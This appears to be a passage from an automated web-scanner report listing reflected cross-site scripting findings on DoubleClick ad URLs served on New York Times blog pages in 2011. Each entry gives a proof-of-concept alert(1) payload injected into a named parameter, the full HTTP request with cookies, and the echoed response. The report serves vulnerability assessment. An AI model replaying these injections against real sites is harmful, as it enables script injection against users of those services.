The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d22bd"-alert(1)-"1f5f893988d was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cbd22bd"-alert(1)-"1f5f893988d&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
x_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cbd22bd"-alert(1)-"1f5f893988d&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
...[SNIP]...

4.24. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7093"-alert(1)-"1e87edde91c was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30ccd7093"-alert(1)-"1e87edde91c&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
6%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30ccd7093"-alert(1)-"1e87edde91c&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowsc
...[SNIP]...

4.25. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4194f'-alert(1)-'19a55e40fc5 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc4194f'-alert(1)-'19a55e40fc5&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
6%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc4194f'-alert(1)-'19a55e40fc5&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.26. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31578'-alert(1)-'30af61f0de1 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick31578'-alert(1)-'30af61f0de1&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick31578'-alert(1)-'30af61f0de1&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.27. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c6b6"-alert(1)-"a19ae64d3de was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick5c6b6"-alert(1)-"a19ae64d3de&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick5c6b6"-alert(1)-"a19ae64d3de&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "ne
...[SNIP]...

4.28. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 351e4"-alert(1)-"2b62cf2cc42 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279351e4"-alert(1)-"2b62cf2cc42&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279351e4"-alert(1)-"2b62cf2cc42&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var
...[SNIP]...

4.29. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa31c'-alert(1)-'7df3705589b was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279aa31c'-alert(1)-'7df3705589b&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279aa31c'-alert(1)-'7df3705589b&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.30. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6f64'-alert(1)-'07e837f5fb5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotod6f64'-alert(1)-'07e837f5fb5&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:39:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
v8/3b05/7/10c/%2a/n%3B239192403%3B0-0%3B0%3B61866713%3B3454-728/90%3B41392052/41409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotod6f64'-alert(1)-'07e837f5fb5&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.
...[SNIP]...

4.31. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f6b3"-alert(1)-"32d83a54c1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto1f6b3"-alert(1)-"32d83a54c1&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:39:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6457

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
v8/3b05/7/10b/%2a/n%3B239192403%3B0-0%3B0%3B61866713%3B3454-728/90%3B41392052/41409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto1f6b3"-alert(1)-"32d83a54c1&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.
...[SNIP]...

4.32. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [ad parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 760ef'-alert(1)-'f6235b48eb5 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250760ef'-alert(1)-'f6235b48eb5&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250760ef'-alert(1)-'f6235b48eb5&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?d
...[SNIP]...

